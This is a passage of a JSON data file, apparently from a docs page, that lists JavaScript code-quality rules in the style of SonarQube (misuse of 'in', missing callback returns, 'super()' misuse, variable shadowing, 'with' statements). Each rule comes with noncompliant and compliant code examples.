Calls to these functions should conform\nto the documented types, otherwise the result will most likely not be what was expected (e.g.: the call would always return <code>false<\/code>).<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconst isTooSmall = Math.abs(x &lt; 0.0042);\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nconst isTooSmall = Math.abs(x) &lt; 0.0042;\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3785","repo":"javascript","name":"\"in\" should not be used with primitive types","htmlDesc":"<p>The <code>in<\/code> operator tests whether the specified property is in the specified object.<\/p>\n<p>If the right operand is of a primitive type (i.e., not an object) the <code>in<\/code> operator raises a <code>TypeError<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x = \"Foo\";\n\"length\" in x; \/\/ Noncompliant: TypeError\n0 in x;        \/\/ Noncompliant: TypeError\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar x = new String(\"Foo\");\n\"length\" in x;    \/\/ true\n0 in x;           \/\/ true\n\"foobar\" in x;    \/\/ false\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3786","repo":"javascript","name":"Template literal placeholder syntax should not be used in regular strings","htmlDesc":"<p>JavaScript allows developers to embed variables or expressions in strings using template literals, instead of string concatenation. 
This is done by\nusing expressions like <code>${variable} <\/code> in a string between two back-ticks (<code>`<\/code>).<\/p>\n<p>When used in a regular string literal (between double or single quotes) the template will not be evaluated and will be used as a literal, which is\nprobably not what was intended.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconsole.log(\"Today is ${date}\"); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nconsole.log(`Today is ${date}`);\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3796","repo":"javascript","name":"Callbacks of array methods should have return statements","htmlDesc":"<p>Arrays in JavaScript have several methods for filtering, mapping or folding that require a callback. Not having a return statement in such a\ncallback function is most likely a mistake.<\/p>\n<p>This rule applies for the following methods of an array:<\/p>\n<ul>\n  <li> <code>Array.from<\/code> <\/li>\n  <li> <code>Array.prototype.every<\/code> <\/li>\n  <li> <code>Array.prototype.filter<\/code> <\/li>\n  <li> <code>Array.prototype.find<\/code> <\/li>\n  <li> <code>Array.prototype.findIndex<\/code> <\/li>\n  <li> <code>Array.prototype.map<\/code> <\/li>\n  <li> <code>Array.prototype.reduce<\/code> <\/li>\n  <li> <code>Array.prototype.reduceRight<\/code> <\/li>\n  <li> <code>Array.prototype.some<\/code> <\/li>\n  <li> <code>Array.prototype.sort<\/code> <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar merged = arr.reduce(function(a, b) {\n  a.concat(b);\n}); \/\/ Noncompliant: No return statement\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar merged = arr.reduce(function(a, b) {\n  return a.concat(b);\n});\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3799","repo":"javascript","name":"Destructuring patterns should not be empty","htmlDesc":"<p>Destructuring is a convenient way of 
extracting multiple values from data stored in (possibly nested) objects and arrays. However, it is possible\nto create an empty pattern that has no effect. When empty curly braces or brackets are used to the right of a property name, most of the time the\nintent was to use a default value instead.<\/p>\n<p>This rule raises an issue when an empty destructuring pattern is used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar {a: {}, b} = myObj; \/\/ Noncompliant\nfunction foo({first: [], second}) { \/\/ Noncompliant\n  \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar {a = {}, b} = myObj;\nfunction foo({first = [], second}) {\n  \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3828","repo":"javascript","name":"\"yield\" expressions should not be used outside generators","htmlDesc":"<p>The <code>yield<\/code> keyword is used in a generator function to return an <code>IteratorResult<\/code> to the caller. It has no other purpose, and\nif found outside such a function will raise a <code>ReferenceError<\/code> because it is then treated as an identifier.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo() {\n  for (var i = 0; i &lt; 5; i++) {\n    yield i * 2;\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction * foo() {\n  for (var i = 0; i &lt; 5; i++) {\n    yield i * 2;\n  }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3834","repo":"javascript","name":"\"Symbol\" should not be used as a constructor","htmlDesc":"<p><code>Symbol<\/code> is a primitive type introduced in ECMAScript2015. Its instances are mainly used as unique property keys.<\/p>\n<p>An instance can only be created by using <code>Symbol<\/code> as a function. 
Using <code>Symbol<\/code> with the <code>new<\/code> operator will raise\na <code>TypeError<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconst sym = new Symbol(\"foo\");   \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nconst sym = Symbol(\"foo\");\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3854","repo":"javascript","name":"super() should be invoked appropriately","htmlDesc":"<p>There are situations where <code>super()<\/code> must be invoked and situations where <code>super()<\/code> cannot be invoked.<\/p>\n<p>The basic rule is: a constructor in a non-derived class cannot invoke <code>super()<\/code>; a constructor in a derived class must invoke\n<code>super()<\/code>.<\/p>\n<p>Furthermore:<\/p>\n<p>- <code>super()<\/code> must be invoked before the <code>this<\/code> and <code>super<\/code> keywords can be used.<\/p>\n<p>- <code>super()<\/code> must be invoked with the same number of arguments as the base class' constructor.<\/p>\n<p>- <code>super()<\/code> can only be invoked in a constructor - not in any other method.<\/p>\n<p>- <code>super()<\/code> cannot be invoked multiple times in the same constructor.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Animal {\n  constructor() {\n    super();         \/\/ Noncompliant, super() cannot be invoked in a base class\n  }\n\n  doSomething() {\n  }\n}\n\nclass Dog extends Animal {\n  constructor(name) {\n    this.name = name;\n    super.doSomething();\n    super();         \/\/ Noncompliant, super() must be invoked before \"this\" or \"super\" is used\n  }\n\n  doSomething() {\n    super();         \/\/ Noncompliant, super() cannot be invoked outside of a constructor\n  }\n}\n\nclass Labrador extends Dog {\n  constructor(name) {\n    super();         \/\/ Noncompliant, super() must be invoked with one argument\n  }\n}\n\nclass GermanShepherd extends Dog {\n  constructor(name) {\n  }                  \/\/ 
Noncompliant, super() must be invoked in constructor of derived class\n}\n\nclass FilaBrasileiro extends Dog {\n  constructor(name) {\n    super(name);\n    super(name);    \/\/ Noncompliant, super() can only be invoked once\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Animal {\n  constructor() {\n  }\n\n  doSomething() {\n  }\n}\n\nclass Dog extends Animal {\n  constructor(name) {\n    super();\n    this.name = name;\n    super.doSomething();\n  }\n\n  doSomething() {\n  }\n}\n\nclass Labrador extends Dog {\n  constructor(name) {\n    super(name);\n  }\n}\n\nclass GermanShepherd extends Dog {\n  constructor(name) {\n    super(name);\n  }\n}\n\nclass FilaBrasileiro extends Dog {\n  constructor(name) {\n    super(name);\n  }\n}\n<\/pre>\n<h2>Known Limitations<\/h2>\n<ul>\n  <li>False negatives: some issues are not raised if the base class is not defined in the same file as the current class.<\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3923","repo":"javascript","name":"All branches in a conditional structure should not have exactly the same implementation","htmlDesc":"<p>Having all branches in a <code>switch<\/code> or <code>if<\/code> chain with the same implementation is an error. Either a copy-paste error was made\nand something different should be executed, or there shouldn't be a <code>switch<\/code>\/<code>if<\/code> chain at all. Note that this rule does not\napply to <code>if<\/code> chains without <code>else<\/code>s, or to <code>switch<\/code>es without <code>default<\/code> clauses.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (b == 0) {  \/\/ Noncompliant\n  doOneMoreThing();\n}\nelse {\n  doOneMoreThing();\n}\n\nlet a = (b == 0) ? 
getValue() : getValue();   \/\/ Noncompliant\n\nswitch (i) {  \/\/ Noncompliant\n  case 1:\n    doSomething();\n    break;\n  case 2:\n    doSomething();\n    break;\n  case 3:\n    doSomething();\n    break;\n  default:\n    doSomething();\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S888","repo":"javascript","name":"Equality operators should not be used in \"for\" loop termination conditions","htmlDesc":"<p>Testing <code>for<\/code> loop termination using an equality operator (<code>==<\/code> and <code>!=<\/code>) is dangerous, because it could set up an\ninfinite loop. Using a broader relational operator instead casts a wider net, and makes it harder (but not impossible) to accidentally write an\ninfinite loop.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (var i = 1; i != 10; i += 2)  \/\/ Noncompliant. Infinite; i goes from 9 straight to 11.\n{\n  \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (var i = 1; i &lt;= 10; i += 2)  \/\/ Compliant\n{\n  \/\/...\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Equality operators are ignored if the loop counter is not modified within the body of the loop and either:<\/p>\n<ul>\n  <li> starts below the ending value and is incremented by 1 on each iteration. <\/li>\n  <li> starts above the ending value and is decremented by 1 on each iteration. 
<\/li>\n<\/ul>\n<p>Equality operators are also ignored when the test is against <code>null<\/code>.<\/p>\n<pre>\nfor (var i = 0; arr[i] != null; i++) {\n  \/\/ ...\n}\n\nfor (var i = 0; (item = arr[i]) != null; i++) {\n  \/\/ ...\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C++:2008, 6-5-2 <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/835\">MITRE, CWE-835<\/a> - Loop with Unreachable Exit Condition ('Infinite Loop') <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/EwDJAQ\">CERT, MSC21-C.<\/a> - Use robust loop termination conditions <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/GwDJAQ\">CERT, MSC21-CPP.<\/a> - Use inequality to terminate a loop whose counter changes\n  by more than one <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:StrictMode","repo":"javascript","name":"\"strict\" mode should be used with caution","htmlDesc":"<p>Even thought it may be a good practice to enforce JavaScript strict mode, doing so could result in unexpected behaviors on browsers that do not\nsupport it yet. Using this feature should therefore be done with caution and with full knowledge of the potential consequences on browsers that do not\nsupport it.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction strict() {\n  'use strict';\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:SwitchWithoutDefault","repo":"javascript","name":"\"switch\" statements should end with \"default\" clauses","htmlDesc":"<p>The requirement for a final <code>default<\/code> clause is defensive programming. 
The clause should either take appropriate action, or contain a\nsuitable comment as to why no action is taken.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch (param) {  \/\/missing default clause\n  case 0:\n    doSomething();\n    break;\n  case 1:\n    doSomethingElse();\n    break;\n}\n\nswitch (param) {\n  default: \/\/ default clause should be the last one\n    error();\n    break;\n  case 0:\n    doSomething();\n    break;\n  case 1:\n    doSomethingElse();\n    break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch (param) {\n  case 0:\n    doSomething();\n    break;\n  case 1:\n    doSomethingElse();\n    break;\n  default:\n    error();\n    break;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 15.0 - The MISRA C <em>switch<\/em> syntax shall be used. <\/li>\n  <li> MISRA C:2004, 15.3 - The final clause of a switch statement shall be the default clause <\/li>\n  <li> MISRA C++:2008, 6-4-3 - A switch statement shall be a well-formed switch statement. <\/li>\n  <li> MISRA C++:2008, 6-4-6 - The final clause of a switch statement shall be the default-clause <\/li>\n  <li> MISRA C:2012, 16.1 - All switch statements shall be well-formed <\/li>\n  <li> MISRA C:2012, 16.4 - Every <em>switch<\/em> statement shall have a <em>default<\/em> label <\/li>\n  <li> MISRA C:2012, 16.5 - A <em>default<\/em> label shall appear as either the first or the last <em>switch label<\/em> of a <em>switch<\/em> statement\n  <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/478.html\">MITRE, CWE-478<\/a> - Missing Default Case in Switch Statement <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness 
<\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:UnusedVariable","repo":"javascript","name":"Unused local variables and functions should be removed","htmlDesc":"<p>If a local variable or a local function is declared but not used, it is dead code and should be removed. Doing so will improve maintainability\nbecause developers will not wonder what the variable or function is used for.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction numberOfMinutes(hours) {\n  var seconds = 0;   \/\/ seconds is never used\n  return hours * 60;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction numberOfMinutes(hours) {\n  return hours * 60;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:VariableShadowing","repo":"javascript","name":"Variables should not be shadowed","htmlDesc":"<p>Overriding a variable declared in an outer scope can strongly impact the readability, and therefore the maintainability, of a piece of code.\nFurther, it could lead maintainers to introduce bugs because they think they're using one variable but are really using another.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nshow: function(point, element) {\n  if (!this.drops.length) return;\n  var drop, affected = [];\n  this.drops.each( function(drop) {  \/\/ Non-Compliant; defines a new 'drop' parameter\n    if(Droppables.isAffected(point, element, drop))\n      affected.push(drop);\n  });\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nshow: function(point, element) {\n  if (!this.drops.length) return;\n  var drop, affected = [];\n  this.drops.each( function(aDrop) {\n    if(Droppables.isAffected(point, element, aDrop))\n      affected.push(aDrop);\n  });\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 5.2 - Identifiers in an inner scope shall not use the same name as an identifier in an outer scope, and therefore hide that\n  identifier 
<\/li>\n  <li> MISRA C++:2008, 2-10-2 - Identifiers declared in an inner scope shall not hide an identifier declared in an outer scope <\/li>\n  <li> MISRA C:2012, 5.3 - An identifier declared in an inner scope shall not hide an identifier declared in an outer scope <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/VwE\">CERT, DCL01-C.<\/a> - Do not reuse variable names in subscopes <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/cwAhAQ\">CERT, DCL01-CPP.<\/a> - Do not reuse variable names in subscopes <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:WithStatement","repo":"javascript","name":"\"with\" statements should not be used","htmlDesc":"<p>The use of the <code>with<\/code> keyword produces an error in JavaScript strict mode code. However, that's not the worst that can be said against\n<code>with<\/code>.<\/p>\n<p>Using <code>with<\/code> allows a short-hand access to an object's properties - assuming they're already set. But use <code>with<\/code> to access\nsome property not already set in the object, and suddenly you're catapulted out of the object scope and into the global scope, creating or overwriting\nvariables there. 
Since the effects of <code>with<\/code> are entirely dependent on the object passed to it, <code>with<\/code> can be dangerously\nunpredictable, and should never be used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x = 'a';\n\nvar foo = {\n  y: 1\n}\n\nwith (foo) {  \/\/ Noncompliant\n  y = 4;  \/\/ updates foo.x\n  x = 3;  \/\/ does NOT add a foo.x property; updates x var in outer scope\n}\nprint(foo.x + \" \" + x); \/\/ shows: undefined 3\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar x = 'a';\n\nvar foo = {\n  y: 1\n}\n\nfoo.y = 4;\nfoo.x = 3;\n\nprint(foo.x + \" \" + x); \/\/ shows: 3 a\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"BUG"}],"language":"js","languages":{"cs":"C#","java":"Java","js":"JavaScript","objc":"Objective C","php":"PHP","swift":"Swift","vbnet":"VB.NET","android":"Android","py":"Python"},"ranktag":"^rank\\d$"};
      Severity: Minor
      Found in docs/js.html by fixme